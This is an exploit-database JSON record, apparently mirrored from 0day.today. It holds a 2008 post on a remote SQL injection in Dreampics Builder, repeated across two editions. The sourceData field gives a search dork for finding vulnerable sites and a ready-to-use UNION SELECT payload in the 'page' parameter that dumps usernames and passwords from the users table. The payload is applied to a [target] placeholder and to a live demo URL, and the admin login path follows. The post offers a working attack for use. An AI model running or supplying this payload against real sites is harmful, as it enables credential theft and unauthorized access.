{"published": "2008-07-09T00:00:00", "id": "1337DAY-ID-3377", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:51:06", "bulletin": {"published": "2008-07-09T00:00:00", "id": "1337DAY-ID-3377", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T00:51:06"}}, "hash": "0197473a0040d77324e61f8c2fcba10d27863d69f2b92383de4d5ef957c3d807", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:51:06", "edition": 1, "title": "Dreampics Builder (page) Remote SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/3377", "modified": "2008-07-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/3377", "references": [], "reporter": "Hussin X", "sourceData": "===========================================================\r\nDreampics Builder (page) Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n#########################################################\r\n#\r\n# PICS BUILDER (page) SQL Injection Vulnerability\r\n#========================================================\r\n# Author: Hussin X =\r\n# =\r\n#========================================================= \r\n#\r\n# script : http://www.dreamlevels.com/dreampics.php\r\n#\r\n# DorK : powered by Dreampics Builder\r\n# \r\n##########################################################\r\n\r\nExploit: \r\n\r\nwww.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nL!VE DEMO:\r\n\r\nhttp://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nAdmin Login :\r\n\r\n/admin/\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "60e52219c36b89343bff5f332a91202f", "key": "sourceHref"}, {"hash": "5d840638ba1c99bd6ab2605c519fdef4", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f0979ab25cc66e158e651bedbe7feebe", "key": "reporter"}, {"hash": "828dd696a7b408151cd1fcbc60c01547", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "286ecf40382cf3527e316cb9b0678ec8", "key": "published"}, {"hash": "286ecf40382cf3527e316cb9b0678ec8", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bae0172192cf2902404e3cdfa75e1613", "key": "sourceData"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "adea2fd1322aba213068ba2ef0f41db22316ec955e4a590c85ee7b7481604fa1", "enchantments": {"vulnersScore": 10.0}, "type": "zdt", "lastseen": "2017-12-31T21:12:37", "edition": 2, "title": "Dreampics Builder (page) Remote SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3377", "modified": "2008-07-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/3377", "references": [], "reporter": "Hussin X", "sourceData": "===========================================================\r\nDreampics Builder (page) Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n#########################################################\r\n#\r\n# PICS BUILDER (page) SQL Injection Vulnerability\r\n#========================================================\r\n# Author: Hussin X =\r\n# =\r\n#========================================================= \r\n#\r\n# script : http://www.dreamlevels.com/dreampics.php\r\n#\r\n# DorK : powered by Dreampics Builder\r\n# \r\n##########################################################\r\n\r\nExploit: \r\n\r\nwww.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nL!VE DEMO:\r\n\r\nhttp://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nAdmin Login :\r\n\r\n/admin/\r\n\r\n\r\n\n# 0day.today [2017-12-31] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "51470c19a06f83b51cab7b0d93c571ca", "key": "href"}, {"hash": "286ecf40382cf3527e316cb9b0678ec8", "key": "modified"}, {"hash": "286ecf40382cf3527e316cb9b0678ec8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f0979ab25cc66e158e651bedbe7feebe", "key": "reporter"}, {"hash": "6213cb8241e9efbf251d27e3307916af", "key": "sourceData"}, {"hash": "dccf49db20fdd18092d3dbf50b6a835d", "key": "sourceHref"}, {"hash": "5d840638ba1c99bd6ab2605c519fdef4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"result": {}}